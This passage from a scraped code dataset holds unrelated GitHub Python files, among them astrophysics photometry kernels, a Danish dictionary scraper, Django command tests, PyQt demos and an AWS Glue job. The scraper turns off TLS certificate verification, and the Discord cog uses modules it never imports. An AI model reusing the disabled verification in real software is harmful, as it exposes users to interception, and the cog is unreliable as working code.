)\n","repo_name":"NATuG3/NATuG3","sub_path":"runner/managers/nucleic_acid_profile.py","file_name":"nucleic_acid_profile.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"766260837","text":"\"\"\"\n\"\"\"\nfrom diffstar.defaults import SFR_MIN\nfrom dsps.dust.att_curves import _frac_transmission_from_k_lambda, sbl18_k_lambda\nfrom dsps.photometry.photometry_kernels import calc_obs_mag, calc_rest_mag\nfrom jax import jit as jjit\nfrom jax import numpy as jnp\nfrom jax import vmap\n\n_interp_vmap = jjit(vmap(jnp.interp, in_axes=[0, None, 0]))\n\n\n@jjit\ndef _calc_logmstar_formed(sfh, dt_gyr):\n sfh = jnp.where(sfh < SFR_MIN, SFR_MIN, sfh)\n smh = jnp.cumsum(sfh * dt_gyr) * 1e9\n logsmh = jnp.log10(smh)\n return logsmh\n\n\n_smh = [0, None]\n_calc_logmstar_formed_vmap = jjit(vmap(_calc_logmstar_formed, in_axes=_smh))\n\n\n@jjit\ndef _calc_age_met_weights_from_sfh_table_vmap():\n pass\n\n\n@jjit\ndef _mult(w1, w2):\n return w1 * w2\n\n\n_mult_vmap = jjit(vmap(vmap(_mult, in_axes=[None, 0]), in_axes=[0, None]))\n_get_weight_matrix = jjit(vmap(_mult_vmap, in_axes=[0, 0]))\n\n\n@jjit\ndef interpolate_ssp_photmag_table(z_gals, z_table, ssp_photmag_table):\n iz_hi = jnp.searchsorted(z_table, z_gals)\n iz_lo = iz_hi - 1\n z_lo = z_table[iz_lo]\n z_hi = z_table[iz_hi]\n dz_bin = z_hi - z_lo\n dz = z_gals - z_lo\n w_lo = 1 - (dz / dz_bin)\n\n ssp_table_zlo = ssp_photmag_table[iz_lo]\n ssp_table_zhi = ssp_photmag_table[iz_hi]\n\n s = ssp_table_zlo.shape\n outshape = [s[0], *[1 for x in s[1:]]]\n w_lo = w_lo.reshape(outshape)\n\n gal_photmags = w_lo * ssp_table_zlo + (1 - w_lo) * ssp_table_zhi\n return gal_photmags\n\n\n_z = [*[None] * 4, 0, *[None] * 4]\n_f = [None, None, 0, 0, None, *[None] * 4]\n_ssp = [None, 0, *[None] * 7]\n_calc_obs_mag_vmap_f = jjit(vmap(calc_obs_mag, in_axes=_f))\n_calc_obs_mag_vmap_f_ssp = jjit(\n vmap(vmap(_calc_obs_mag_vmap_f, in_axes=_ssp), in_axes=_ssp)\n)\n_calc_obs_mag_vmap_f_ssp_z = jjit(vmap(_calc_obs_mag_vmap_f_ssp, in_axes=_z))\n\n_calc_obs_mag_vmap_f_ssp_singlemet = jjit(vmap(_calc_obs_mag_vmap_f, in_axes=_ssp))\n_calc_obs_mag_vmap_f_ssp_z_singlemet = jjit(\n vmap(_calc_obs_mag_vmap_f_ssp_singlemet, in_axes=_z)\n)\n\n\n_calc_rest_mag_vmap_f = jjit(vmap(calc_rest_mag, in_axes=[None, None, 0, 0]))\n_calc_rest_mag_vmap_f_ssp = jjit(\n vmap(\n vmap(_calc_rest_mag_vmap_f, in_axes=[None, 0, None, None]),\n in_axes=[None, 0, None, None],\n )\n)\n\n_calc_rest_mag_vmap_f_ssp_singlemet = jjit(\n vmap(_calc_rest_mag_vmap_f, in_axes=[None, 0, None, None]),\n)\n\n\n@jjit\ndef _get_filter_effective_wavelength_rest(filter_wave, filter_trans):\n norm = jnp.trapz(filter_trans, x=filter_wave)\n lambda_eff = jnp.trapz(filter_trans * filter_wave, x=filter_wave) / norm\n return lambda_eff\n\n\n@jjit\ndef _get_filter_lambda_eff_obsframe_kern(filter_wave, filter_trans, redshift):\n lambda_eff_rest = _get_filter_effective_wavelength_rest(filter_wave, filter_trans)\n lambda_eff = lambda_eff_rest / (1 + redshift)\n return lambda_eff\n\n\n@jjit\ndef _get_effective_attenuation(filter_wave, filter_trans, redshift, dust_params):\n \"\"\"Attenuation factor at the effective wavelength of the filter\"\"\"\n\n lambda_eff = _get_filter_lambda_eff_obsframe_kern(\n filter_wave, filter_trans, redshift\n )\n lambda_eff_micron = lambda_eff / 10_000\n\n uv_bump_ampl, plaw_slope, dust_Av = dust_params\n k_lambda = sbl18_k_lambda(lambda_eff_micron, uv_bump_ampl, plaw_slope)\n frac_transmission = _frac_transmission_from_k_lambda(k_lambda, dust_Av)\n return frac_transmission\n\n\n_g = in_axes = [None, None, 0, 0]\n_f = in_axes = [0, 0, None, None]\n_get_effective_attenuation_vmap = jjit(vmap(vmap(_get_effective_attenuation, _f), _g))\n","repo_name":"LSSTDESC/lsstdesc-diffsky","sub_path":"lsstdesc_diffsky/photometry/photometry_interpolation_kernels.py","file_name":"photometry_interpolation_kernels.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13190875806","text":"import string\nimport sys\nfrom colorama import Fore, Back, Style\nfrom colorama import init\ninit(autoreset=True)\nimport urllib.request, urllib.parse, urllib.error\nfrom bs4 import BeautifulSoup\nimport ssl\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\n\nfname = input(\"Enter file name: \")\nfhand = open(fname, encoding=\"utf8\")\n\n\nSYMBOLS = '{}()[].,:;+-*/&|<>=~$1234567890?'\nwords = list()\nfor line in fhand:\n\tfor s in SYMBOLS:\n\t\tline = line.replace(s,\" \")\n\tprint(line)\n\tline=line.split()\n\t\n\twords= words + line\n\n# TYPE OF WORD\n\tfor word in words :\n\t\tprint(Fore.YELLOW + word)\n\t\ttry:\n\t\t\turl = \"https://ordnet.dk/ddo/ordbog?query=%s\" % (urllib.parse.quote(word)) # input('Enter URL- ')\n\t\t\thtml = urllib.request.urlopen(url, context=ctx).read()\n\t\t\n\t\t\tsoup = BeautifulSoup(html, 'html.parser')\n\t\t\t#print(soup)\n\t\t\t# # Retrieve all of the anchor divs\n\t\t\tdivs = soup('div')\n\t\t\tfor div in divs:\n\t\t\t\tdiv_class = div.get('class', [])\n\t\t\t\tif \"definitionBoxTop\" in div_class:\n\t\t\t\t\t# print(div_class)\n\t\t\t\t\tchildren = div.findChildren(\"span\" , recursive=False)\n\t\t\t\t\tfor child in children: \n\t\t\t\t\t\tspan_class = child.get('class', [])\n\t\t\t\t\t\tif \"tekstmedium\" in span_class:\n\t\t\t\t\t\t\ttype_word=child.text\n\t\t\t\t\t\t\tprint(Fore.CYAN + type_word)\n# SOUND\t\n\t\t\tspan = soup.body.find('span', attrs={'class': 'lydskrift'})\n\t\t\tprint(span.text)\n\t\t\tfor href in span.find_all('a', recursive=True):\n\t\t\t\tprint( Fore.GREEN + str(href.get('href', \"NotFound\")))\n\n\t\texcept:\n\t\t\tprint(Fore.RED + \"not found \" )\n\n\n\n","repo_name":"AnaSoles/LANG_Danis_BankWords","sub_path":"dk_learn_new_words_gh.py","file_name":"dk_learn_new_words_gh.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22150897279","text":"import discord\r\nfrom discord.ext import commands \r\nimport traceback\r\n\r\nclass Lmgtfy(commands.Cog):\r\n\tdef __init__(self, bot):\r\n\t\tself.bot = bot\r\n\t\tself.URL = \"http://tinyurl.com/api-create.php\"\t\r\n\r\n\tdef shorten(self, url_long):\r\n\t\ttry:\r\n\t\t\turl = self.URL + \"?\" \\\r\n\t\t\t\t+ urllib.parse.urlencode({\"url\": url_long})\r\n\t\t\tres = requests.get(url)\r\n\t\t\treturn res.text\r\n\t\texcept Exception as e:\r\n\t\t\traise\r\n\r\n\t@commands.command()\r\n\tasync def lmgfy(self, ctx, *, search:str = None):\t\r\n\t\tif search:\r\n\t\t\ttry:\r\n\t\t\t\ts = self.shorten(f\"https://lmgtfy.com/?q={'+'.join(search.split())}\")\r\n\t\t\t\tif not ctx.message.author.top_role.colour:\r\n\t\t\t\t\tcol = 0xda3c3c\r\n\t\t\t\telse:\r\n\t\t\t\t\tcol = ctx.message.author.top_role.colour\r\n\r\n\t\t\t\tembed=discord.Embed(title=s, color=col)\r\n\t\t\t\tawait ctx.send(embed=embed)\r\n\t\t\texcept Exception as e:\r\n\t\t\t\ttraceback.print_exc()\r\n\r\ndef setup(bot):\r\n\tbot.add_cog(Lmgtfy(bot))","repo_name":"ScoobyChan/ScrappyBot","sub_path":"Cogs/Lmgtfy.py","file_name":"Lmgtfy.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23356810985","text":"import time\r\nimport curses\r\nimport time\r\nimport sys\r\n\r\ndef intro():\r\n print (\"Dust. A planet of sand and ruin. A desert planet.\\n\" \r\n \"It is the most important planet in the Third Imperium,\\n\" \r\n \"For the sands of Dust are like nothing else in the universe.\\n\"\r\n \"You are the new Duke of Dust,\" \r\n \"entrusted by the Emperor to govern the as yet\\n\" \r\n \"ungovernable world and rule in his name.\\n\"\r\n \"What ambitions might you have?\")\r\n\r\nintro()\r\n\r\ndef menu(root, current_row):\r\n curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)\r\n height, width = root.getmaxyx()\r\n \r\n menu = [ \"Household\", \"Council\", \"Diplomacy\", \"Warfare\", \"Intrigue\", \"Economy\"]\r\n \r\n for idx, element in enumerate(menu):\r\n y = height // 2 + idx\r\n x = width // 2 - len(element) // 2 \r\n\r\n if idx == current_row:\r\n root.attron(curses.color_pair(1))\r\n root.addstr(y, x, element)\r\n root.attroff(curses.color_pair(1))\r\n\r\n else:\r\n root.addstr(y, x, element)\r\n\r\n root.refresh()\r\n# time.sleep(5)\r\n\r\ndef main(root):\r\n curses.curs_set(0)\r\n\r\n current_row = 0\r\n\r\n menu(root, current_row)\r\n\r\n while True:\r\n key = root.getch()\r\n\r\n if key == curses.KEY_UP and current_row > 0:\r\n current_row -= 1 \r\n \r\n elif key == curses.KEY_DOWN and current_row < 5:\r\n current_row += 1\r\n\r\n elif key == ord(\"e\"):\r\n root.refresh()\r\n root.addstr(0, 0, \"The Letter E\")\r\n \r\n elif key == ord(\"q\"):\r\n break\r\n\r\n menu(root, current_row)\r\n\r\n root.refresh()\r\n\r\n\r\ncurses.wrapper(main)\r\n\r\n \r\n","repo_name":"devindoherty/dust","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26648999766","text":"from pdf2image import convert_from_path\nfrom PIL import Image\nimport pytesseract\nimport pathlib\nimport os\nimport argparse\n\nfrom pdf2image.exceptions import (\n PDFInfoNotInstalledError,\n PDFPageCountError,\n PDFSyntaxError,\n)\n\n\ndef main():\n # use argparse to get input & output paths\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", type=str)\n\n args = parser.parse_args()\n\n # loop through files with glob */**.pdf ...find syntax\n\n # impliment error handling\n temp_folder = \"img/temp/\"\n\n if args.input:\n images = convert_from_path(\n args.input,\n output_folder=temp_folder,\n )\n\n infile_name = args.input.split(\"/\")\n outfile_name = infile_name[-1].split(\".\")[0]\n\n # options:\n # convert_from_path(pdf_path, dpi=200, output_folder=None, first_page=None, last_page=None, fmt='ppm', jpegopt=None, thread_count=1, userpw=None, use_cropbox=False, strict=False, transparent=False, single_file=False, output_file=str(uuid.uuid4()), poppler_path=None, grayscale=False, size=None, paths_only=False, use_pdftocairo=False, timeout=600, hide_attributes=False)\n\n # IS THIS BETTER?\n\n # with tempfile.TemporaryDirectory() as path:\n # images_from_path = convert_from_path(args.input, output_folder=path)\n # # Do something here\n\n ocrfile = pathlib.Path(f\"./ocr/{outfile_name}.txt\")\n\n # create progress bar with richtext library\n\n print(\"There are\", len(images), \"pages.\")\n\n # this will be the inner loop for each pdf in the folder\n for index, image in enumerate(images):\n print(f\"Extracting text from page {index+1}...\")\n text = pytesseract.image_to_string(image) # time consuming part\n\n with open(ocrfile, \"a\") as outfile:\n outfile.write(text)\n outfile.write(f\"\\n END PAGE {index+1}\\n\") # do i need this?\n print(f\"Page {index+1} appended to file.\")\n\n print(f\"deleting temporary files from {temp_folder}...\")\n for file in os.listdir(temp_folder):\n if os.path.isfile(f\"{temp_folder}/{file}\"):\n os.remove(f\"{temp_folder}/{file}\")\n\n print(\"Conversion complete :)\")\n\n # create loop for files in folder that are already images not pdfs\n\n # uninstall opencv-python and remove from requirements.txt? didn't seem to need it.\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kgilbert78/pdf-to-text","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74904178348","text":"# Python\nfrom __future__ import unicode_literals\n\n# Django\nfrom django.core.management import get_commands, load_command_class, BaseCommand, CommandError\n\n# Test App\nfrom . import trackcalls\n\n\ndef get_command_class(name):\n app_name = get_commands()[name]\n if isinstance(app_name, BaseCommand):\n instance = app_name\n else:\n instance = load_command_class(app_name, name)\n return type(instance)\n\n\ndef track_command_class(name):\n klass = get_command_class(name)\n klass.execute = trackcalls(klass.execute)\n assert not klass.execute.has_been_called\n\n\ndef get_command_called(name):\n klass = get_command_class(name)\n return getattr(klass.execute, 'has_been_called', None)\n\n\ndef test_site_update_default(command_runner, settings):\n # Run site update with built-in default options, verify only expected\n # commands have been called.\n track_command_class('check')\n track_command_class('migrate')\n track_command_class('collectstatic')\n track_command_class('flush')\n result = command_runner('site_update', interactive=False)\n assert result[0] is None\n assert get_command_called('check')\n assert get_command_called('migrate')\n assert get_command_called('collectstatic')\n assert not get_command_called('flush')\n\n\ndef test_site_update_list_groups(command_runner, settings):\n result = command_runner('site_update', list_groups=True, verbosity=1)\n assert result[0] is None\n assert '[default]' in result[1]\n assert 'migrate(' not in result[1]\n result = command_runner('site_update', list_groups=True, verbosity=2)\n assert result[0] is None\n assert '[default]' in result[1]\n assert 'migrate(' in result[1]\n\n\ndef test_site_update_custom_default_group(command_runner, settings):\n # Replace the default update commands via settings, then verify that the\n # updated list of 'default' commands was used.\n settings.SITE_UPDATE_COMMANDS = {\n 'default': [\n 'check',\n 'migrate',\n ('update_permissions', (), {}, 'django_extensions'),\n ('collectstatic', (), {'clear': True}, 'staticfiles'),\n ],\n }\n track_command_class('check')\n track_command_class('migrate')\n track_command_class('update_permissions')\n track_command_class('collectstatic')\n track_command_class('flush')\n result = command_runner('site_update', interactive=False)\n assert result[0] is None\n assert get_command_called('check')\n assert get_command_called('migrate')\n assert get_command_called('update_permissions')\n assert get_command_called('collectstatic')\n assert not get_command_called('flush')\n\n\ndef test_site_update_new_group(command_runner, settings):\n # Create a new group of update commands via settings, run site_update with\n # 'clean' subcommand and verify only the expected commands were called.\n settings.SITE_UPDATE_COMMANDS = {\n 'clean': [\n ('remove_stale_contenttypes', (), {}, 'contenttypes'),\n ('clearsessions', (), {}, 'sessions'),\n ],\n }\n track_command_class('check')\n track_command_class('migrate')\n track_command_class('collectstatic')\n track_command_class('remove_stale_contenttypes')\n track_command_class('clearsessions')\n result = command_runner('site_update', 'clean', interactive=False)\n assert result[0] is None\n assert not get_command_called('check')\n assert not get_command_called('migrate')\n assert not get_command_called('collectstatic')\n assert get_command_called('remove_stale_contenttypes')\n assert get_command_called('clearsessions')\n\n\ndef test_site_update_multiple_groups(command_runner, settings):\n # Define a new group of subcommands, which will be merged with default\n # settings to include the default group. Run using 'default' and 'clean'\n # subcommands, verify that all commands in both groups were called.\n settings.SITE_UPDATE_COMMANDS = {\n 'clean': [\n ('remove_stale_contenttypes', (), {}, 'contenttypes'),\n ('clearsessions', (), {}, 'sessions'),\n ],\n }\n track_command_class('check')\n track_command_class('migrate')\n track_command_class('collectstatic')\n track_command_class('remove_stale_contenttypes')\n track_command_class('clearsessions')\n result = command_runner('site_update', 'default', 'clean', interactive=False)\n assert result[0] is None\n assert get_command_called('check')\n assert get_command_called('migrate')\n assert get_command_called('collectstatic')\n assert get_command_called('remove_stale_contenttypes')\n assert get_command_called('clearsessions')\n\n\ndef test_site_update_app_not_installed(command_runner, settings):\n # Define a new group with a subcommand that only runs if the 'blah' app is\n # installed. Run using 'blah' subcommand should still succeed since\n # 'blahapp' is specified and not installed.\n settings.SITE_UPDATE_COMMANDS = {\n 'blah': [\n ('blah', (), {}, 'blahapp'),\n ],\n }\n track_command_class('check')\n result = command_runner('site_update', 'blah', interactive=False)\n assert result[0] is None\n assert not get_command_called('check')\n\n\ndef test_site_update_unknown_command(command_runner, settings):\n # Define a new group with an invalid command, should fail since 'argh' is\n # an unknown command.\n settings.SITE_UPDATE_COMMANDS = {\n 'argh': [\n 'argh',\n ],\n }\n result = command_runner('site_update', 'argh', interactive=False)\n assert isinstance(result[0], CommandError)\n\n\ndef test_site_update_invalid_command_specs(command_runner, settings):\n # Define groups with invalid command specifications; both should fail.\n settings.SITE_UPDATE_COMMANDS = {\n 'wtf': [\n (),\n ],\n 'wtf2': [\n None,\n ],\n }\n result = command_runner('site_update', 'wtf', interactive=False)\n assert isinstance(result[0], CommandError)\n result = command_runner('site_update', 'wtf2', interactive=False)\n assert isinstance(result[0], CommandError)\n\n\ndef test_site_update_unknown_group(command_runner, settings):\n # Run with unknown subcommand (unknown group); should fail.\n result = command_runner('site_update', 'hoohah', interactive=False)\n assert isinstance(result[0], CommandError)\n","repo_name":"ninemoreminutes/django-site-utils","sub_path":"test_project/test_app/tests/test_site_update.py","file_name":"test_site_update.py","file_ext":"py","file_size_in_byte":6321,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"3133552391","text":"from PyQt5.QtWidgets import QWidget,QPushButton,QFileDialog,QLineEdit,QApplication\nimport sys\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI()\n def initUI(self):\n self.setGeometry(300,300,500,500)\n self.setWindowTitle('打开对话框!')\n self.bt1=QPushButton('打开文件',self)\n self.bt1.move(350,20)\n self.bt1.clicked.connect(self.OpenFileDialog)\n self.text=QLineEdit('路径',self)\n self.text.setGeometry(80,50,150,30)\n self.show()\n def OpenFileDialog(self):\n fname,ftype=QFileDialog.getOpenFileName(self,'打开文件','./')\n if fname[0]:\n self.text.setText(fname)\nif __name__=='__main__':\n app=QApplication(sys.argv)\n ex=Example()\n exit(app.exec_())\n","repo_name":"sherwinleehao/photools","sub_path":"Reference/getOpenFileName.py","file_name":"getOpenFileName.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16367451079","text":"from rest_framework import serializers, exceptions\n\nfrom .models import StaticItem\n\n\nclass StaticSerializer(serializers.ModelSerializer):\n cpc = serializers.DecimalField(max_digits=10, decimal_places=2, read_only=True)\n cpm = serializers.DecimalField(max_digits=10, decimal_places=2, read_only=True)\n\n class Meta:\n model = StaticItem\n fields = '__all__'\n\n def validate(self, attrs):\n if attrs.get('views', 0) <= 0:\n attrs['views'] = None\n if attrs.get('click', 0) <= 0:\n attrs['click'] = None\n if 'cost' in attrs and attrs['cost'] < 0:\n raise exceptions.ValidationError('cost must be positive')\n\n return attrs","repo_name":"Ra1ze505/BcraftStatistic","sub_path":"statistic/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70655733228","text":"from pathlib import Path\nimport sys\n\nfrom PyQt6.QtWidgets import QApplication, QWidget\nfrom PyQt6 import uic\n\nBASE_DIR = Path(__file__).parent\n\n\nclass MainWindow(QWidget):\n def __init__(self) -> None:\n super().__init__()\n ui_file = BASE_DIR / Path(\"ui/main.ui\")\n uic.loadUi(ui_file, self)\n\n\nif __name__ == \"__main__\":\n # Qt application setup\n app = QApplication(sys.argv)\n app.setStyle(\"Fusion\")\n win = MainWindow()\n win.show()\n sys.exit(app.exec())\n","repo_name":"timlau/PyQt6-Examples","sub_path":"ui_app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21038412970","text":"import numpy as np\n\nfrom bootcamp.exceptions import StopTraining\nfrom bootcamp.utils import compute_return\n\nclass Monitor(object):\n def __init__(self):\n self._returns = []\n\n def __call__(self, trainer, state):\n batch_returns = [compute_return(episode.rewards) for episode in state['batch']]\n self._returns += batch_returns\n relevant_returns = self._returns[-trainer.env.spec.trials:]\n average_return = np.mean(relevant_returns)\n if average_return > trainer.env.spec.reward_threshold:\n print('Solved after {} iterations'.format(state['iteration']))\n raise StopTraining\n","repo_name":"jasonkriss/bootcamp","sub_path":"bootcamp/callbacks/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6103702346","text":"import numpy as np\nfrom gensim import models\n\nimport settings\n\n\ndef read_embeddings(type_emb='glove', path_test=None):\n\tprint('\\n-----------------------------------------')\n\tprint('Loading embeddings ' + type_emb + '...')\n\tprint('-----------------------------------------')\n\n\tword2vec = {}\n\tif type_emb == 'word2vec':\n\t\tword2vec = models.KeyedVectors.load_word2vec_format(settings.dir_embeddings_word2vec, binary=True)\n\t\tprint(settings.dir_embeddings_word2vec)\n\telse:\n\t\tpath = settings.dir_embeddings_glove if type_emb == 'glove' else settings.path if path_test is None else path_test\n\t\tfor line in open(path):\n\t\t\tvalues = line.split()\n\t\t\tword2vec[str(values[0]).lower()] = np.asarray(values[1:], dtype='float32')\n\t\tprint(path)\n\n\treturn word2vec\t\t\n\n\n\n","repo_name":"cmdelcr/senti-embeddings","sub_path":"util/util_common.py","file_name":"util_common.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33492190297","text":"\n'''\n.plot() has several optional parameters. Most notably, the kind parameter accepts eleven different string values and determines which kind of plot you’ll create:\n \"area\" is for area plots.\n \"bar\" is for vertical bar charts.\n \"barh\" is for horizontal bar charts.\n \"box\" is for box plots.\n \"hexbin\" is for hexbin plots.\n \"hist\" is for histograms.\n \"kde\" is for kernel density estimate charts.\n \"density\" is an alias for \"kde\".\n \"line\" is for line graphs.\n \"pie\" is for pie charts.\n \"scatter\" is for scatter plots.\n'''\n\nimport numpy as np\nimport pandas as pd \nimport matplotlib.pyplot as plt\n#import altair as alt\n\n# import data\nshelters = pd.read_csv('https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2020/2020-12-01/shelters.csv')\n\n# see summary of data\nshelters.info()\n\n# convert datetime column\nshelters['occupancy_date'] = pd.to_datetime(shelters['occupancy_date'])\nshelters['occupancy_year'] = shelters.occupancy_date.dt.year\nshelters['occupancy_month'] = shelters.occupancy_date.dt.month\n\n# line plot showing occupancy/capacity over time\nshelters.groupby('occupancy_date').mean()[['occupancy','capacity']].plot() # ,xlim=(0,20),ylim=(0,100)\n\n# mean occupancy/capacity by by sector\nshelters[shelters.occupancy_date=='2017-01-01'].groupby('sector').mean()[['occupancy','capacity']].plot(kind='bar')\nshelters[shelters.occupancy_date=='2019-12-31'].groupby('sector').mean()[['occupancy','capacity']].plot(kind='bar')\n\n# how num of org, shelters, facility, program have changed over time\nshelters.groupby('occupancy_date').nunique()[['organization_name','shelter_name','facility_name','program_name']].plot() # ,xlim=(0,20),ylim=(0,100)\n\n# seasonal - summer - j,j,a; fall - s,o,n; winter - d,j,f; spring - m,a,m\nseason_dict={6 : \"summer\", 7 :\"summer\", 8 : \"summer\",\n 9 : \"fall\", 10 :\"fall\", 11 : \"fall\",\n 12 : \"winter\", 1 :\"winter\", 2 : \"winter\",\n 3 : \"spring\", 4 :\"spring\", 5 : \"spring\",} \nshelters['season'] = shelters['occupancy_month'].map(season_dict) \nshelters.groupby('season').mean()[['occupancy','capacity']].plot()\n\n# Immigrant, Refugee and Extreme weather shelters\nshelters['Immigrant']=shelters.organization_name.str.contains('Immigrant')\nshelters['Refugee']=shelters.organization_name.str.contains('Refugee')\nshelters['Extreme']=shelters.program_name.str.contains('Extreme')\n# create new column using .apply and a function\ndef f(row):\n if row['Immigrant'] == True:\n val = 'Immigrant'\n elif row['Refugee'] == True:\n val = 'Refugee'\n elif row['Extreme'] == True:\n val = 'Extreme'\n else:\n val = 'Normal'\n return val\nshelters['type'] = shelters.apply(f, axis=1)\n\nshelters[shelters.occupancy_date=='2019-12-31'].groupby(['type'])\\\n .sum()[['occupancy','capacity']]\\\n .plot(y='occupancy', kind='pie',figsize=(12,7))\n #.plot(kind='pie', subplots=True)\n #df.set_index('x').plot()\n\n# putting it all together using matplotlib\n#plt.figure(figsize = (10,6))\nfig, ax = plt.subplots(2,3)\nfig.subplots_adjust(hspace=0.5)\nfig.suptitle('Analysis of Toronto Shelters Data', fontsize=26, color='blue')\nfig.text(0.75, 0.01, 'https://twitter.com/vivekparasharr', style = 'italic', fontsize = 10, color = \"blue\") \nshelters.groupby('occupancy_date').mean()[['occupancy','capacity']].plot(title='Capacity and Occupany over Time', ax=ax[0,0],figsize=(12,7)) # ,xlim=(0,20),ylim=(0,100)\nshelters.groupby('occupancy_date').nunique()[['organization_name','shelter_name','facility_name','program_name']].plot(title='# of Orgs, Shelters, Facilities, Programs', ax=ax[0,1],figsize=(12,7)) # ,xlim=(0,20),ylim=(0,100)\nshelters.groupby('season').mean()[['occupancy','capacity']].plot(title='Capacity and Occupancy over Time', ax=ax[0,2],figsize=(12,7))\nshelters[shelters.occupancy_date=='2017-01-01'].groupby('sector').mean()[['occupancy','capacity']].plot(title='2017: Cap/Ocp by Sector', kind='bar', ax=ax[1,0],figsize=(12,7))\nshelters[shelters.occupancy_date=='2019-12-31'].groupby('sector').mean()[['occupancy','capacity']].plot(title='2019: Cap/Ocp by Sector', kind='bar', ax=ax[1,1],figsize=(12,7))\nshelters[shelters.occupancy_date=='2019-12-31'].groupby(['type']).sum()[['occupancy','capacity']].plot(title='2019: Occupancy by Type', y='occupancy', kind='pie', ax=ax[1,2],figsize=(12,7))\nplt.savefig('/Users/vivekparashar/OneDrive/OneDrive-GitHub/Challenges-and-Competitions/TidyTuesday/Data/2020-12-01/20201201-Toronto-Shelters.png', dpi=300, facecolor='w')\nplt.show()\n\n'''\nfig.subplots_adjust(..)\nleft = 0.125 # the left side of the subplots of the figure\nright = 0.9 # the right side of the subplots of the figure\nbottom = 0.1 # the bottom of the subplots of the figure\ntop = 0.9 # the top of the subplots of the figure\nwspace = 0.2 # the amount of width reserved for blank space between subplots\nhspace = 0.2 # the amount of height reserved for white space between subplots\n'''\n","repo_name":"vivekparasharr/Challenges-and-Competitions","sub_path":"TidyTuesday/20201201-toronto-shelters.py","file_name":"20201201-toronto-shelters.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"29457919287","text":"import os\nimport tempfile\n\nimport pytest\nfrom app import create_app, register_blueprints\nfrom app.plugins import db, ma\n# flake8: noqa\nfrom app.repositories.models import Ingredient, Order, OrderDetail, Size\n\nfrom .fixtures.ingredient import (ingredient_mock, ingredient_uri,\n ingredient, ingredients,\n create_ingredient, create_ingredients)\nfrom .fixtures.order import (client_data_mock, order_uri, client_data,\n order, create_order, create_orders)\nfrom .fixtures.size import (size_mock, size_uri, size, sizes,\n create_size, create_sizes)\nfrom .fixtures.beverage import (beverage_mock, beverage_uri, beverage,\n beverages, create_beverage, create_beverages)\nfrom .fixtures.report import report_uri\n\n\n@pytest.fixture\ndef app():\n\n db_fd, dbpath = tempfile.mkstemp()\n\n class Config:\n SQLALCHEMY_DATABASE_URI = 'sqlite:///{}'.format(dbpath)\n TESTING = True\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n flask_app = create_app(Config)\n register_blueprints(flask_app)\n flask_app.app_context().push()\n db.init_app(flask_app)\n ma.init_app(flask_app)\n\n db.create_all()\n\n yield flask_app\n\n db.session.remove()\n db.drop_all()\n os.close(db_fd)\n os.remove(dbpath)\n\n\n@pytest.fixture\ndef client(app):\n client = app.test_client()\n return client\n","repo_name":"sbateca/python-pizza-planet-refactor","sub_path":"app/test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17929472372","text":"import sys\nfrom awsglue.transforms import *\nfrom awsglue.utils import getResolvedOptions\nfrom pyspark.context import SparkContext\nfrom awsglue.context import GlueContext\nfrom awsglue.job import Job\n\nargs = getResolvedOptions(sys.argv, [\"JOB_NAME\"])\nsc = SparkContext()\nglueContext = GlueContext(sc)\nspark = glueContext.spark_session\njob = Job(glueContext)\njob.init(args[\"JOB_NAME\"], args)\n\n# Script generated for node accelerometer_trusted\naccelerometer_trusted_node1 = glueContext.create_dynamic_frame.from_options(\n format_options={\"multiline\": False},\n connection_type=\"s3\",\n format=\"json\",\n connection_options={\n \"paths\": [\"s3://renee-stedi-project-lakehouse/accelerometer_trusted/\"],\n \"recurse\": True,\n },\n transformation_ctx=\"accelerometer_trusted_node1\",\n)\n\n# Script generated for node step_trainer_landing\nstep_trainer_landing_node1684277885644 = glueContext.create_dynamic_frame.from_options(\n format_options={\"multiline\": False},\n connection_type=\"s3\",\n format=\"json\",\n connection_options={\n \"paths\": [\"s3://renee-stedi-project-lakehouse/step_trainer_landing/\"],\n \"recurse\": True,\n },\n 